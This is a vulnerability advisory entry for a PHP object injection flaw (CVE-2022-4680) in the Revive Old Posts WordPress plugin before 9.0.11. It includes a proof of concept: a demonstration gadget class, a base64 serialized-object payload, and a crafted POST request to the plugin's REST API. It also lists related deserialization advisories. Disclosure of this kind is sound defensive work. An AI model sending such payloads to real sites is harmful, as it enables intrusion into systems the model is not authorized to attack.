Revive Old Posts – Social Media Auto Post and Scheduling Plugin < 9.0.11 – PHP Object Injection | CVE 2022-4680 | Plugin Vulnerabilities

Description

The plugin unserializes user input provided via the settings, which could allow high privilege users such as admin to perform PHP Object Injection when a suitable gadget is present.

Proof of Concept

To simulate a gadget chain, put the following code in a plugin:

class Evil {
  public function __wakeup() : void {
    die("Arbitrary deserialization");
  }
}

Use the add account function, intercept it and add or replace the id or pages parameter to Tzo0OiJFdmlsIjowOnt9Ow== (which is the base64 of O:4:"Evil":0:{};):

POST /wp-json/tweet-old-post/v8/api/?req=add_account_fb HTTP/1.1

{"id":"Tzo0OiJFdmlsIjowOnt9Ow==","pages":["Tzo0OiJFdmlsIjowOnt9Ow=="]}

Affects Plugins

Fixed in 9.0.11

References

CVE

Classification

Type

OBJECT INJECTION

OWASP top 10

A8: Insecure Deserialization

CWE

CVSS

Miscellaneous

Original Researcher

Nguyen Huu Do

Submitter

Nguyen Huu Do

Verified

Yes

WPVDB ID

f4197386-975d-4e53-8fc9-9425732da9af

Timeline

Publicly Published

2023-01-04 (about 1 years ago)

Added

2023-01-04 (about 1 years ago)

Last Updated

2023-01-04 (about 1 years ago)

Other

Published

Title

Published

2024-03-29

Title

Essential Addons for Elementor < 5.9.14 - Author+ PHP Object Injection

Published

2022-08-08

Title

String Locator < 2.6.0 - Authenticated PHAR Deserialization

Published

2024-03-04

Title

Vimeography < 2.3.3 - Contributor+ PHP Object Injection

Published

2023-02-08

Title

Replyable < 2.2.10 - Subscriber+ PHP Object Injection

Published

2018-12-08

Title

Smush Image Compression and Optimization < 3.0.0 - Authenticated Phar Deserialization